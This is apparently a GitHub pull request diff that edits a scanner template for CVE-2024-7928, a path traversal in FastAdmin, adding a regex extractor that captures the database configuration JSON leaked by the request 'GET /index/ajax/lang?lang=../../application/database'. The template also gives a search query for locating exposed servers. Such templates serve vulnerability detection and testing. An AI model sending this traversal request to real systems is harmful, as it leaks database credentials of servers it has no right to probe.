### PR TITLE
Modified CVE-2024-7928.yaml to extract data based on regex

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,3 @@
-private/
 .idea/
 .DS_Store
 local/

--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
+private/
 .idea/
 .DS_Store
 local/

--- a/http/cves/2024/CVE-2024-7928.yaml
+++ b/http/cves/2024/CVE-2024-7928.yaml
@@ -1,8 +1,9 @@
+
 id: CVE-2024-7928
 
 info:
   name: FastAdmin < V1.3.4.20220530 - Path Traversal
-  author: s4e-io
+  author: s4e-io & sicksec
   severity: medium
   description: |
     A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
@@ -48,4 +49,9 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "jsonpReturn\\((?P<json_content>\\{.*?\\})\\);"

--- a/http/cves/2024/CVE-2024-7928.yaml
+++ b/http/cves/2024/CVE-2024-7928.yaml
@@ -1,4 +1,3 @@
-
 id: CVE-2024-7928
 
 info:
@@ -23,13 +22,11 @@ info:
     product: fastadmin
     fofa-query: icon_hash="-1036943727"
   tags: cve,cve2024,fastadmin,lfi
-
 http:
   - raw:
       - |
         GET /index/ajax/lang?lang=../../application/database HTTP/1.1
         Host: {{Hostname}}
-
     matchers-condition: and
     matchers:
       - type: word
@@ -40,16 +37,13 @@ http:
           - '"username":'
           - '"database":'
         condition: and
-
       - type: word
         part: content_type
         words:
           - 'application/javascript'
-
       - type: status
         status:
           - 200
-
     extractors:
       - type: regex
         part: body


### PR DESCRIPTION
### Template / PR Information

I have modified the CVE-2024-7928.yaml in order to use extractors to grab the necessary values form the response
- Updated CVE-2024-7928
- References:

### Template Validation

<img width="1168" alt="Screenshot 2024-08-22 at 13 22 28" src="https://github.com/user-attachments/assets/30a96127-29a9-4416-8db8-12381f3659ca">


I've validated this template locally?
- [x] YES
- [ ] NO